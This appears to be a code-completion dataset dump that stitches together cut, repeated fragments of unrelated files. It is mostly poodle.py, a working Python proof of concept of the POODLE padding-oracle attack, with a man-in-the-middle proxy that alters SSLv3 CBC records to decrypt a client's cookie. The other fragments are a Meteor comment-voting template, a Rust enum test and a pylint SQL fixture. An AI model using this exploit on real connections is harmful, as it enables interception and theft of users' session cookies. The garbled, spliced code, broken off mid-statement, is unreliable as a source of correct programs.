self.start_exploit = False
self.decipherable = False
self.request = ''
self.byte_decipher = 0
def run(self):
self.client_connection()
self.size_of_block()
self.start_exploit = True
# disconnect the client to avoid "connection reset by peer"
self.client_disconect()
print "Start decrypting the request..."
self.exploit()
print '\n'
print draw("%r" %(self.request), bold=True, fg_yellow=True)
print '\n'
self.client_disconect()
return
def exploit(self):
# start at block 1, finish at block n-2
# 0 => IV unknow, n => padding block, n-1 => MAC block
length_f = self.length_frame
for i in range(1,(length_f/self.length_block) - 1):
self.current_block = i
for j in range(self.length_block-1, -1, -1):
(plain, nb_request) = self.find_plaintext_byte(self.frame,j)
self.request += plain
percent = 100.0 * self.byte_decipher / (length_f - 2 * self.length_block)
sys.stdout.write("\rProgression %2.0f%% - client's request %4s - byte found: %r" % (percent, nb_request, plain))
sys.stdout.flush()
return
def choosing_block(self, current_block):
return self.frame[current_block * self.length_block:(current_block + 1) * self.length_block]
def find_plaintext_byte(self, frame, byte):
nb_request = 0
plain = ""
print ''
while True:
self.client_connection()
prefix_length = byte
suffix_length = self.length_block - byte
self.send_request_from_the_client(self.length_block+self.nb_prefix+prefix_length, suffix_length)
# sleep to avoid "connection reset by peer" on macintosh
time.sleep(0.0001)
self.client_disconect()
if self.decipherable is True:
self.byte_decipher += 1
plain = self.decipher(self.frame)
self.decipherable = False
break
nb_request += 1
sys.stdout.write("\rclient's request %4s" % (nb_request))
sys.stdout.flush()
return (chr(plain), nb_request)
def size_of_block(self):
print "Begins searching the size of a block...\n"
self.send_request_from_the_client()
reference_length = self.length_frame
i = 0
while True:
self.send_request_from_the_client(i)
current_length = self.length_frame
self.length_block = current_length - reference_length
if self.length_block != 0:
self.nb_prefix = i
print draw("CBC block size " + str(self.length_block) + "\n", bold=True)
break
i += 1
self.decipherable = False
def decipher(self, data):
return self.choosing_block(self.current_block-1)[-1] ^ self.choosing_block(-2)[-1] ^ (self.length_block-1)
def alter(self):
if self.start_exploit is True:
self.frame = bytearray(self.frame)
self.frame = self.frame[:-self.length_block] + self.choosing_block(self.current_block)
return str(self.frame)
return self.frame
def set_decipherable(self, status):
self.decipherable = status
return
def set_length_frame(self, data):
self.frame = data
self.length_frame = len(data)
def | client_connection | identifier_name |
|
poodle.py | self.request.send(b'OK')
except ssl.SSLError as e:
pass
return
class Server:
"""The secure server.
A sample server, serving on his host and port waiting the client
"""
def __init__(self, host, port):
self.host = host
self.port = port
def connection(self):
SocketServer.TCPServer.allow_reuse_address = True
self.httpd = SocketServer.TCPServer((self.host, self.port), SecureTCPHandler)
server = threading.Thread(target=self.httpd.serve_forever)
server.daemon=True
server.start()
print('Server is serving HTTPS on {!r} port {}'.format(self.host, self.port))
return
def get_host(self):
return self.host
def get_port(self):
return self.port
def disconnect(self):
print('Server stop serving HTTPS on {!r} port {}'.format(self.host, self.port))
self.httpd.shutdown()
return
class Client:
""" The unsecure post of the client can be a "unsecure" browser for example.
The client generate a random cookie and send it to the server through the proxy
The attacker by injecting javascript code can control the sending request of the client to the proxy -> server
"""
def __init__(self, host, port):
self.proxy_host = host
self.proxy_port = port
self.cookie = ''.join(random.SystemRandom().choice(string.uppercase + string.digits + string.lowercase) for _ in xrange(15))
print draw("Sending request : ", bold=True, fg_yellow=True)
print draw("GET / HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n", bold=True, fg_yellow=True)
def connection(self):
# Initialization of the client
ssl_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_sock = ssl.wrap_socket(ssl_sock, server_side=False, ssl_version=ssl.PROTOCOL_SSLv3)
ssl_sock.connect((self.proxy_host,self.proxy_port))
ssl_sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket = ssl_sock
return
def request(self, path=0, data=0):
srt_path = ''
srt_data = ''
for x in range(0,path):
srt_path += 'A'
for x in range(0,data):
srt_data += 'D'
try:
self.socket.sendall(b"GET /"+ srt_path +" HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n" + srt_data)
msg = "".join([str(i) for i in self.socket.recv(1024).split(b"\r\n")])
except ssl.SSLError as e:
pass
pass
return
def disconnect(self):
self.socket.close()
return
class ProxyTCPHandler(SocketServer.BaseRequestHandler):
"""
Start a connection to the secure server and handle multiple socket connections between the client and the server
Informe the attacker about the client's frames or the server's response
Finally redirect the data from the client to the server and inversely
"""
def handle(self):
# Connection to the secure server
socket_server = socket.create_connection((server.get_host(), server.get_port()))
# input allow us to monitor the socket of the client and the server
inputs = [socket_server, self.request]
running = True
data_altered = False
length_header = 24
while running:
readable = select.select(inputs, [], [])[0]
for source in readable:
if source is socket_server:
data = socket_server.recv(1024)
if len(data) == 0:
running = False
break
if data_altered is True:
(content_type, version, length) = struct.unpack('>BHH', data[0:5])
if content_type == 23:
poodle.set_decipherable(True)
data_altered = False
# we send data to the client
self.request.send(data)
elif source is self.request:
ssl_header = self.request.recv(5)
if ssl_header == '':
running = False
break
(content_type, version, length) = struct.unpack('>BHH', ssl_header)
data = self.request.recv(length)
if len(data) == 0:
running = False
if length == 32:
length_header = 32
if content_type == 23 and length > length_header:
poodle.set_length_frame(data)
data = poodle.alter()
data_altered = True
# we send data to the server
socket_server.send(ssl_header+data)
return
class Proxy:
""" Assimilate to a MitmProxy
start a serving on his host and port and redirect the data to the server due to this handler
"""
def __init__(self, host, port):
self.host = host
self.port = port
def connection(self):
SocketServer.TCPServer.allow_reuse_address = True
httpd = SocketServer.TCPServer((self.host, self.port), ProxyTCPHandler)
proxy = threading.Thread(target=httpd.serve_forever)
proxy.daemon=True
proxy.start()
print('Proxy is launched on {!r} port {}'.format(self.host, self.port))
self.proxy = httpd
return
def disconnect(self):
print('Proxy is stopped on {!r} port {}'.format(self.host, self.port))
self.proxy.shutdown()
return
class Poodle(Client):
""" Assimilate to the attacker
detect the length of a CBC block
alter the ethernet frame of the client to decipher a byte regarding the proxy informations
"""
def __init__(self, client):
self.client = client
self.length_block = 0
self.start_exploit = False
self.decipherable = False
self.request = ''
self.byte_decipher = 0
def run(self):
self.client_connection()
self.size_of_block()
self.start_exploit = True
# disconnect the client to avoid "connection reset by peer"
self.client_disconect()
print "Start decrypting the request..."
self.exploit()
print '\n'
print draw("%r" %(self.request), bold=True, fg_yellow=True)
print '\n'
self.client_disconect()
return
def exploit(self):
# start at block 1, finish at block n-2
# 0 => IV unknow, n => padding block, n-1 => MAC block
length_f = self.length_frame
for i in range(1,(length_f/self.length_block) - 1):
self.current_block = i
for j in range(self.length_block-1, -1, -1):
(plain, nb_request) = self.find_plaintext_byte(self.frame,j)
self.request += plain
percent = 100.0 * self.byte_decipher / (length_f - 2 * self.length_block)
sys.stdout.write("\rProgression %2.0f%% - client's request %4s - byte found: %r" % (percent, nb_request, plain))
sys.stdout.flush()
return |
def find_plaintext_byte(self, frame, byte):
nb_request = 0
plain = ""
print ''
while True:
self.client_connection()
prefix_length = byte
suffix_length = self.length_block - byte
self.send_request_from_the_client(self.length_block+self.nb_prefix+prefix_length, suffix_length)
# sleep to avoid "connection reset by peer" on macintosh
time.sleep(0.0001)
self.client_disconect()
if self.decipherable is True:
self.byte_decipher += 1
plain = self.decipher(self.frame)
self.decipherable = False
break
nb_request += 1
sys.stdout.write("\rclient's request %4s" % (nb_request))
sys.stdout.flush()
return (chr(plain), nb_request)
def size_of_block(self):
print "Begins searching the size of a block...\n"
self.send_request_from_the_client()
reference_length = self.length_frame
i = 0
while True:
self.send_request_from_the_client(i)
current_length = self.length_frame
self.length_block = current_length - reference_length
if self.length_block != 0:
self.nb_prefix = i
print draw("CBC block size " + str(self.length_block) + "\n", bold=True)
break
i += 1
self.decipherable = False
def decipher(self, data):
return self.choosing_block(self.current_block-1)[-1] ^ self.choosing_block(-2)[-1] ^ (self.length_block-1)
def alter(self):
if self.start_exploit is True:
self.frame = bytearray(self.frame)
self.frame = self.frame[:-self.length_block] + self.choosing_block(self.current_block)
return str |
def choosing_block(self, current_block):
return self.frame[current_block * self.length_block:(current_block + 1) * self.length_block] | random_line_split |
poodle.py | self.request.send(b'OK')
except ssl.SSLError as e:
pass
return
class Server:
"""The secure server.
A sample server, serving on his host and port waiting the client
"""
def __init__(self, host, port):
self.host = host
self.port = port
def connection(self):
SocketServer.TCPServer.allow_reuse_address = True
self.httpd = SocketServer.TCPServer((self.host, self.port), SecureTCPHandler)
server = threading.Thread(target=self.httpd.serve_forever)
server.daemon=True
server.start()
print('Server is serving HTTPS on {!r} port {}'.format(self.host, self.port))
return
def get_host(self):
return self.host
def get_port(self):
return self.port
def disconnect(self):
print('Server stop serving HTTPS on {!r} port {}'.format(self.host, self.port))
self.httpd.shutdown()
return
class Client:
""" The unsecure post of the client can be a "unsecure" browser for example.
The client generate a random cookie and send it to the server through the proxy
The attacker by injecting javascript code can control the sending request of the client to the proxy -> server
"""
def __init__(self, host, port):
self.proxy_host = host
self.proxy_port = port
self.cookie = ''.join(random.SystemRandom().choice(string.uppercase + string.digits + string.lowercase) for _ in xrange(15))
print draw("Sending request : ", bold=True, fg_yellow=True)
print draw("GET / HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n", bold=True, fg_yellow=True)
def connection(self):
# Initialization of the client
ssl_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_sock = ssl.wrap_socket(ssl_sock, server_side=False, ssl_version=ssl.PROTOCOL_SSLv3)
ssl_sock.connect((self.proxy_host,self.proxy_port))
ssl_sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket = ssl_sock
return
def request(self, path=0, data=0):
srt_path = ''
srt_data = ''
for x in range(0,path):
srt_path += 'A'
for x in range(0,data):
srt_data += 'D'
try:
self.socket.sendall(b"GET /"+ srt_path +" HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n" + srt_data)
msg = "".join([str(i) for i in self.socket.recv(1024).split(b"\r\n")])
except ssl.SSLError as e:
pass
pass
return
def disconnect(self):
self.socket.close()
return
class ProxyTCPHandler(SocketServer.BaseRequestHandler):
"""
Start a connection to the secure server and handle multiple socket connections between the client and the server
Informe the attacker about the client's frames or the server's response
Finally redirect the data from the client to the server and inversely
"""
def handle(self):
# Connection to the secure server
socket_server = socket.create_connection((server.get_host(), server.get_port()))
# input allow us to monitor the socket of the client and the server
inputs = [socket_server, self.request]
running = True
data_altered = False
length_header = 24
while running:
readable = select.select(inputs, [], [])[0]
for source in readable:
if source is socket_server:
data = socket_server.recv(1024)
if len(data) == 0:
running = False
break
if data_altered is True:
(content_type, version, length) = struct.unpack('>BHH', data[0:5])
if content_type == 23:
poodle.set_decipherable(True)
data_altered = False
# we send data to the client
self.request.send(data)
elif source is self.request:
ssl_header = self.request.recv(5)
if ssl_header == '':
running = False
break
(content_type, version, length) = struct.unpack('>BHH', ssl_header)
data = self.request.recv(length)
if len(data) == 0:
running = False
if length == 32:
length_header = 32
if content_type == 23 and length > length_header:
poodle.set_length_frame(data)
data = poodle.alter()
data_altered = True
# we send data to the server
socket_server.send(ssl_header+data)
return
class Proxy:
| return
class Poodle(Client):
""" Assimilate to the attacker
detect the length of a CBC block
alter the ethernet frame of the client to decipher a byte regarding the proxy informations
"""
def __init__(self, client):
self.client = client
self.length_block = 0
self.start_exploit = False
self.decipherable = False
self.request = ''
self.byte_decipher = 0
def run(self):
self.client_connection()
self.size_of_block()
self.start_exploit = True
# disconnect the client to avoid "connection reset by peer"
self.client_disconect()
print "Start decrypting the request..."
self.exploit()
print '\n'
print draw("%r" %(self.request), bold=True, fg_yellow=True)
print '\n'
self.client_disconect()
return
def exploit(self):
# start at block 1, finish at block n-2
# 0 => IV unknow, n => padding block, n-1 => MAC block
length_f = self.length_frame
for i in range(1,(length_f/self.length_block) - 1):
self.current_block = i
for j in range(self.length_block-1, -1, -1):
(plain, nb_request) = self.find_plaintext_byte(self.frame,j)
self.request += plain
percent = 100.0 * self.byte_decipher / (length_f - 2 * self.length_block)
sys.stdout.write("\rProgression %2.0f%% - client's request %4s - byte found: %r" % (percent, nb_request, plain))
sys.stdout.flush()
return
def choosing_block(self, current_block):
return self.frame[current_block * self.length_block:(current_block + 1) * self.length_block]
def find_plaintext_byte(self, frame, byte):
nb_request = 0
plain = ""
print ''
while True:
self.client_connection()
prefix_length = byte
suffix_length = self.length_block - byte
self.send_request_from_the_client(self.length_block+self.nb_prefix+prefix_length, suffix_length)
# sleep to avoid "connection reset by peer" on macintosh
time.sleep(0.0001)
self.client_disconect()
if self.decipherable is True:
self.byte_decipher += 1
plain = self.decipher(self.frame)
self.decipherable = False
break
nb_request += 1
sys.stdout.write("\rclient's request %4s" % (nb_request))
sys.stdout.flush()
return (chr(plain), nb_request)
def size_of_block(self):
print "Begins searching the size of a block...\n"
self.send_request_from_the_client()
reference_length = self.length_frame
i = 0
while True:
self.send_request_from_the_client(i)
current_length = self.length_frame
self.length_block = current_length - reference_length
if self.length_block != 0:
self.nb_prefix = i
print draw("CBC block size " + str(self.length_block) + "\n", bold=True)
break
i += 1
self.decipherable = False
def decipher(self, data):
return self.choosing_block(self.current_block-1)[-1] ^ self.choosing_block(-2)[-1] ^ (self.length_block-1)
def alter(self):
if self.start_exploit is True:
self.frame = bytearray(self.frame)
self.frame = self.frame[:-self.length_block] + self.choosing_block(self.current_block)
return str | """ Assimilate to a MitmProxy
start a serving on his host and port and redirect the data to the server due to this handler
"""
def __init__(self, host, port):
self.host = host
self.port = port
def connection(self):
SocketServer.TCPServer.allow_reuse_address = True
httpd = SocketServer.TCPServer((self.host, self.port), ProxyTCPHandler)
proxy = threading.Thread(target=httpd.serve_forever)
proxy.daemon=True
proxy.start()
print('Proxy is launched on {!r} port {}'.format(self.host, self.port))
self.proxy = httpd
return
def disconnect(self):
print('Proxy is stopped on {!r} port {}'.format(self.host, self.port))
self.proxy.shutdown() | identifier_body |
comment.js | Template.comment.helpers({
submittedText: function() {
var date = new Date(this.submitted);
console.log("vote =====>", this);
var d=date.getDate();
var m=date.getMonth()+1;
var y=date.getFullYear();
return m + " - " + d + " - " + y;
},
postID : function(postID){
this.postID = postID;
return postID;
},
up: function(){
var userId = Meteor.userId();
if (userId && _.include(this.upvoters, userId)) {
return true;
} else{
return false;
}
},
down: function(){
var userId = Meteor.userId();
if (userId && _.include(this.downvoters, userId)) {
return true;
}else{
return false;
}
},
// we will have to edit this function
upvotedClass: function() {
var userId = Meteor.userId();
if (userId && ( !_.include(this.upvoters, userId) || _.include(this.downvoters, userId) ) ) | else {
return 'disabled';
}
},
downvotedClass: function() {
var userId = Meteor.userId();
if (userId && ( !_.include(this.downvoters, userId) || _.include(this.upvoters, userId) ) ) {
return 'downvotable';
} else {
return 'disabled';
}
},
});
Template.comment.events({
'click .upvotable': function(e) {
e.preventDefault();
console.log("e =====>", e);
var postID = this.postID;
Meteor.call('upvoteComment', this._id, postID);
},
'click .downvotable': function(e) {
e.preventDefault();
console.log("e =====>", e);
var postID = this.postID;
Meteor.call('downvoteComment', this._id, postID);
},
'click .translatable': function(e,t) {
var curTarget = $(e.currentTarget),
srcTxt = this.body,
srcLang = 'en',
tarLang = 'de';
Meteor.call('getTranslation', srcTxt, srcLang, tarLang, function(err, res){
if (res.error) {console.log("err", res.message); curTarget.closest('div.row').find('.translated-text').text('(' + "sorry, something went wrong" + ')');}
else curTarget.closest('div.row').find('.translated-text').text('(' + res.message + ')');
});
}
});
| {
return 'upvotable';
} | conditional_block |
comment.js | Template.comment.helpers({
submittedText: function() {
var date = new Date(this.submitted);
console.log("vote =====>", this);
var d=date.getDate();
var m=date.getMonth()+1;
var y=date.getFullYear();
return m + " - " + d + " - " + y;
},
postID : function(postID){
this.postID = postID;
return postID;
},
up: function(){
var userId = Meteor.userId();
if (userId && _.include(this.upvoters, userId)) {
return true;
} else{
return false;
}
},
down: function(){
var userId = Meteor.userId();
if (userId && _.include(this.downvoters, userId)) {
return true;
}else{
return false;
}
},
// we will have to edit this function
upvotedClass: function() {
var userId = Meteor.userId();
if (userId && ( !_.include(this.upvoters, userId) || _.include(this.downvoters, userId) ) ) {
return 'upvotable';
} else {
return 'disabled';
}
},
downvotedClass: function() {
var userId = Meteor.userId();
if (userId && ( !_.include(this.downvoters, userId) || _.include(this.upvoters, userId) ) ) {
return 'downvotable';
} else {
return 'disabled';
}
},
});
Template.comment.events({
'click .upvotable': function(e) {
e.preventDefault();
console.log("e =====>", e);
var postID = this.postID;
Meteor.call('upvoteComment', this._id, postID);
},
'click .downvotable': function(e) {
e.preventDefault();
console.log("e =====>", e);
var postID = this.postID;
Meteor.call('downvoteComment', this._id, postID);
},
'click .translatable': function(e,t) {
var curTarget = $(e.currentTarget),
srcTxt = this.body,
srcLang = 'en',
tarLang = 'de';
Meteor.call('getTranslation', srcTxt, srcLang, tarLang, function(err, res){
if (res.error) {console.log("err", res.message); curTarget.closest('div.row').find('.translated-text').text('(' + "sorry, something went wrong" + ')');}
else curTarget.closest('div.row').find('.translated-text').text('(' + res.message + ')');
});
} | }); | random_line_split |
|
const-enum-vector.rs | // Copyright 2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
enum | { V1(int), V0 }
static C: [E; 3] = [E::V0, E::V1(0xDEADBEE), E::V0];
pub fn main() {
match C[1] {
E::V1(n) => assert!(n == 0xDEADBEE),
_ => panic!()
}
match C[2] {
E::V0 => (),
_ => panic!()
}
}
| E | identifier_name |
const-enum-vector.rs | // Copyright 2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at | // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
enum E { V1(int), V0 }
static C: [E; 3] = [E::V0, E::V1(0xDEADBEE), E::V0];
pub fn main() {
match C[1] {
E::V1(n) => assert!(n == 0xDEADBEE),
_ => panic!()
}
match C[2] {
E::V0 => (),
_ => panic!()
}
} | // http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or | random_line_split |
const-enum-vector.rs | // Copyright 2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
enum E { V1(int), V0 }
static C: [E; 3] = [E::V0, E::V1(0xDEADBEE), E::V0];
pub fn main() | {
match C[1] {
E::V1(n) => assert!(n == 0xDEADBEE),
_ => panic!()
}
match C[2] {
E::V0 => (),
_ => panic!()
}
} | identifier_body |
|
func_noerror_query_getattr.py | # pylint:disable=R0201
from OpenOrange import *
from Document import Document
from Label import Label
from SQLTools import codeOrder, monthCode
from datetime import datetime
class AlotmentDoc(Document):
classattr = "classattr"
def getRecorda(self):
class newObj(object):
Status = 1
RootLabel = "100"
SerNr = "SerNr"
Labels = "100,200"
TransDate = datetime.now().date()
def name(self):
return "Alotment"
return newObj()
def getExtra(self, val1, val2="2", val3="3", val4=4):
specs = self.getRecorda()
sql = "WHERE?AND [al].{%s} IN ('%s')\n" % ("SerNr", "','".join([val1, val3, val2]))
sql += "WHERE?AND [al].{SerNr} = i|%i|\n" % specs.Status
sql += "WHERE?AND [al].TransDate < d|%s|\n" % specs.TransDate
sql += "WHERE?AND SerNr = "
if specs.Status == 1:
sql += "%s" % val4
if 1 in [0, 0]:
pass
else:
sql += ""
return sql
def getExtra2(self, test):
parent = self
specs = self.getRecorda()
mydict = {1:1, 2:2}
mylist = [1, 2]
listcomp = "listcomp," + "extra"
if test > 0:
return specs.Status
x = "'%s' as test_date\n, " % date("")
x += "'%s' as test_time\n, " % time("")
x += "'%i' as test_len\n, " % len(specs.RootLabel)
x += "'%s' as test_map\n, " % "','".join(map(str, mylist))
x += "'%s' as test_keys\n, " % "','".join(mydict.keys())
x += "'%s' as test_subscript\n," % ["SerNr","RoomType"][specs.Status]
#x += "'%s' as test_classattr\n, " % self.classattr
x += '"%s" as test_dic\n, ' % mydict
x += "'%s' as test_parentattr\n, " % parent.record #Parent None attribute
x += '"%s" as test_binoplist\n, ' % mylist #+ mylist
x += '"%s" as test_listcomp1\n, ' % "".join([a.strip() for a in listcomp.split(',')])
x += '"%s" as test_listcomp2\n, ' % "".join([d for d in listcomp])
x += '"%s" as test_listcomp3\n, ' % "".join([str(b) for b in listcomp])
x += '"%s" as test_listcomp4\n,' % "".join([c.strip() for c in listcomp])
x += '"%s" as test_listcomp5\n,' % [('s|%s|') % (z) for z in mylist]
x += '"%s" as test_listcomp6\n,' % "".join([y for y in ("a", "b")])
# pylint:disable=E1101
x += '"%s" as inferenceErr\n,' % self.non.existant
x += '"%s" as indexErr\n' % mylist[2]
return x
def getExtra3(self):
specs = self.getRecorda()
subquery = Query()
subquery.sql = "SerNr"
return "ORDER BY %s, %s" % (specs.SerNr, subquery.sql)
def getExtra4(self):
specs = self.getRecorda()
labels = None
if specs.Labels:
lis = []
labs = specs.Labels.split(",")
for lb in labs:
lis.append("','".join(Label.getTreeLeaves(lb)))
labels = "','".join(lis)
return "WHERE?AND SerNr IN ('%s') " % labels
def getExtra5(self, txt):
txt = txt.replace(":1","RoomType IS NULL\n")
return txt
def getExtra6(self):
|
def getExtra7(self):
specs = self.getRecorda()
factor = 0.0
if 1 > 0:
factor = (float(specs.Status) / float(specs.Status))
txt = "WHERE?AND (%s / 1) * %s > 0\n" % (1, factor)
return txt
def run(self):
specs = self.getRecorda()
leaves = Label.getTreeLeaves(specs.RootLabel)
query7 = Query()
query7.sql = "SELECT SerNr, %s,\n" % codeOrder("SerNr", leaves)
query7.sql += monthCode("[al].TransDate")
query7.sql += "\n, %s, \n" % self.getExtra2(test=1)
query7.sql += self.getExtra2(0)
query7.sql += "\nFROM %s al\n" % specs.name()
query7.sql += self.getExtra("1", "2", val3="33")
query7.sql += self.getExtra4()
query7.sql += self.getExtra5("WHERE?AND :1")
query7.sql += self.getExtra6()
query7.sql += self.getExtra7()
method = getattr(self, "getExtra3____"[:-4])
query7.sql += method()
query7.open()
self.run2([100, 200])
def run2(self, extraList):
query2 = Query()
query2.sql = self.getMore(extraList)
query2.open()
def getMore(self, moreList):
return "SELECT * FROM Alotment WHERE SerNr IN ('%s')" % "','".join(moreList)
| txt = ""
q = {}
q["one"] = Query()
q["one"].sql = "WHERE?AND SerNr IS NULL\n"
q["two"] = Query()
q["two"].sql = "WHERE?AND SerNr IS NOT NULL\n"
slist = ["one", "two"]
for index in slist:
txt += q[index].sql
return txt | identifier_body |
func_noerror_query_getattr.py | # pylint:disable=R0201
from OpenOrange import *
from Document import Document
from Label import Label
from SQLTools import codeOrder, monthCode
from datetime import datetime
class AlotmentDoc(Document):
classattr = "classattr"
def getRecorda(self):
class newObj(object):
Status = 1
RootLabel = "100"
SerNr = "SerNr"
Labels = "100,200"
TransDate = datetime.now().date()
def name(self):
return "Alotment"
return newObj()
def getExtra(self, val1, val2="2", val3="3", val4=4):
specs = self.getRecorda()
sql = "WHERE?AND [al].{%s} IN ('%s')\n" % ("SerNr", "','".join([val1, val3, val2]))
sql += "WHERE?AND [al].{SerNr} = i|%i|\n" % specs.Status
sql += "WHERE?AND [al].TransDate < d|%s|\n" % specs.TransDate
sql += "WHERE?AND SerNr = "
if specs.Status == 1:
sql += "%s" % val4
if 1 in [0, 0]:
pass
else:
sql += ""
return sql
def getExtra2(self, test):
parent = self
specs = self.getRecorda()
mydict = {1:1, 2:2}
mylist = [1, 2]
listcomp = "listcomp," + "extra"
if test > 0:
return specs.Status
x = "'%s' as test_date\n, " % date("")
x += "'%s' as test_time\n, " % time("")
x += "'%i' as test_len\n, " % len(specs.RootLabel)
x += "'%s' as test_map\n, " % "','".join(map(str, mylist))
x += "'%s' as test_keys\n, " % "','".join(mydict.keys())
x += "'%s' as test_subscript\n," % ["SerNr","RoomType"][specs.Status]
#x += "'%s' as test_classattr\n, " % self.classattr
x += '"%s" as test_dic\n, ' % mydict
x += "'%s' as test_parentattr\n, " % parent.record #Parent None attribute
x += '"%s" as test_binoplist\n, ' % mylist #+ mylist
x += '"%s" as test_listcomp1\n, ' % "".join([a.strip() for a in listcomp.split(',')])
x += '"%s" as test_listcomp2\n, ' % "".join([d for d in listcomp])
x += '"%s" as test_listcomp3\n, ' % "".join([str(b) for b in listcomp])
x += '"%s" as test_listcomp4\n,' % "".join([c.strip() for c in listcomp])
x += '"%s" as test_listcomp5\n,' % [('s|%s|') % (z) for z in mylist]
x += '"%s" as test_listcomp6\n,' % "".join([y for y in ("a", "b")])
# pylint:disable=E1101
x += '"%s" as inferenceErr\n,' % self.non.existant
x += '"%s" as indexErr\n' % mylist[2]
return x
def | (self):
specs = self.getRecorda()
subquery = Query()
subquery.sql = "SerNr"
return "ORDER BY %s, %s" % (specs.SerNr, subquery.sql)
def getExtra4(self):
specs = self.getRecorda()
labels = None
if specs.Labels:
lis = []
labs = specs.Labels.split(",")
for lb in labs:
lis.append("','".join(Label.getTreeLeaves(lb)))
labels = "','".join(lis)
return "WHERE?AND SerNr IN ('%s') " % labels
def getExtra5(self, txt):
txt = txt.replace(":1","RoomType IS NULL\n")
return txt
def getExtra6(self):
txt = ""
q = {}
q["one"] = Query()
q["one"].sql = "WHERE?AND SerNr IS NULL\n"
q["two"] = Query()
q["two"].sql = "WHERE?AND SerNr IS NOT NULL\n"
slist = ["one", "two"]
for index in slist:
txt += q[index].sql
return txt
def getExtra7(self):
specs = self.getRecorda()
factor = 0.0
if 1 > 0:
factor = (float(specs.Status) / float(specs.Status))
txt = "WHERE?AND (%s / 1) * %s > 0\n" % (1, factor)
return txt
def run(self):
specs = self.getRecorda()
leaves = Label.getTreeLeaves(specs.RootLabel)
query7 = Query()
query7.sql = "SELECT SerNr, %s,\n" % codeOrder("SerNr", leaves)
query7.sql += monthCode("[al].TransDate")
query7.sql += "\n, %s, \n" % self.getExtra2(test=1)
query7.sql += self.getExtra2(0)
query7.sql += "\nFROM %s al\n" % specs.name()
query7.sql += self.getExtra("1", "2", val3="33")
query7.sql += self.getExtra4()
query7.sql += self.getExtra5("WHERE?AND :1")
query7.sql += self.getExtra6()
query7.sql += self.getExtra7()
method = getattr(self, "getExtra3____"[:-4])
query7.sql += method()
query7.open()
self.run2([100, 200])
def run2(self, extraList):
query2 = Query()
query2.sql = self.getMore(extraList)
query2.open()
def getMore(self, moreList):
return "SELECT * FROM Alotment WHERE SerNr IN ('%s')" % "','".join(moreList)
| getExtra3 | identifier_name |
func_noerror_query_getattr.py | # pylint:disable=R0201
from OpenOrange import *
from Document import Document
from Label import Label
from SQLTools import codeOrder, monthCode
from datetime import datetime
class AlotmentDoc(Document):
classattr = "classattr"
def getRecorda(self):
class newObj(object):
Status = 1
RootLabel = "100"
SerNr = "SerNr"
Labels = "100,200"
TransDate = datetime.now().date()
def name(self):
return "Alotment"
return newObj()
def getExtra(self, val1, val2="2", val3="3", val4=4):
specs = self.getRecorda()
sql = "WHERE?AND [al].{%s} IN ('%s')\n" % ("SerNr", "','".join([val1, val3, val2]))
sql += "WHERE?AND [al].{SerNr} = i|%i|\n" % specs.Status
sql += "WHERE?AND [al].TransDate < d|%s|\n" % specs.TransDate
sql += "WHERE?AND SerNr = "
if specs.Status == 1:
sql += "%s" % val4
if 1 in [0, 0]:
pass
else:
sql += ""
return sql
def getExtra2(self, test):
parent = self
specs = self.getRecorda()
mydict = {1:1, 2:2}
mylist = [1, 2]
listcomp = "listcomp," + "extra"
if test > 0:
return specs.Status
x = "'%s' as test_date\n, " % date("")
x += "'%s' as test_time\n, " % time("")
x += "'%i' as test_len\n, " % len(specs.RootLabel)
x += "'%s' as test_map\n, " % "','".join(map(str, mylist))
x += "'%s' as test_keys\n, " % "','".join(mydict.keys())
x += "'%s' as test_subscript\n," % ["SerNr","RoomType"][specs.Status]
#x += "'%s' as test_classattr\n, " % self.classattr
x += '"%s" as test_dic\n, ' % mydict
x += "'%s' as test_parentattr\n, " % parent.record #Parent None attribute
x += '"%s" as test_binoplist\n, ' % mylist #+ mylist
x += '"%s" as test_listcomp1\n, ' % "".join([a.strip() for a in listcomp.split(',')])
x += '"%s" as test_listcomp2\n, ' % "".join([d for d in listcomp])
x += '"%s" as test_listcomp3\n, ' % "".join([str(b) for b in listcomp])
x += '"%s" as test_listcomp4\n,' % "".join([c.strip() for c in listcomp])
x += '"%s" as test_listcomp5\n,' % [('s|%s|') % (z) for z in mylist]
x += '"%s" as test_listcomp6\n,' % "".join([y for y in ("a", "b")])
# pylint:disable=E1101
x += '"%s" as inferenceErr\n,' % self.non.existant
x += '"%s" as indexErr\n' % mylist[2]
return x
def getExtra3(self):
specs = self.getRecorda()
subquery = Query()
subquery.sql = "SerNr"
return "ORDER BY %s, %s" % (specs.SerNr, subquery.sql)
def getExtra4(self):
specs = self.getRecorda()
labels = None
if specs.Labels:
|
return "WHERE?AND SerNr IN ('%s') " % labels
def getExtra5(self, txt):
txt = txt.replace(":1","RoomType IS NULL\n")
return txt
def getExtra6(self):
txt = ""
q = {}
q["one"] = Query()
q["one"].sql = "WHERE?AND SerNr IS NULL\n"
q["two"] = Query()
q["two"].sql = "WHERE?AND SerNr IS NOT NULL\n"
slist = ["one", "two"]
for index in slist:
txt += q[index].sql
return txt
def getExtra7(self):
specs = self.getRecorda()
factor = 0.0
if 1 > 0:
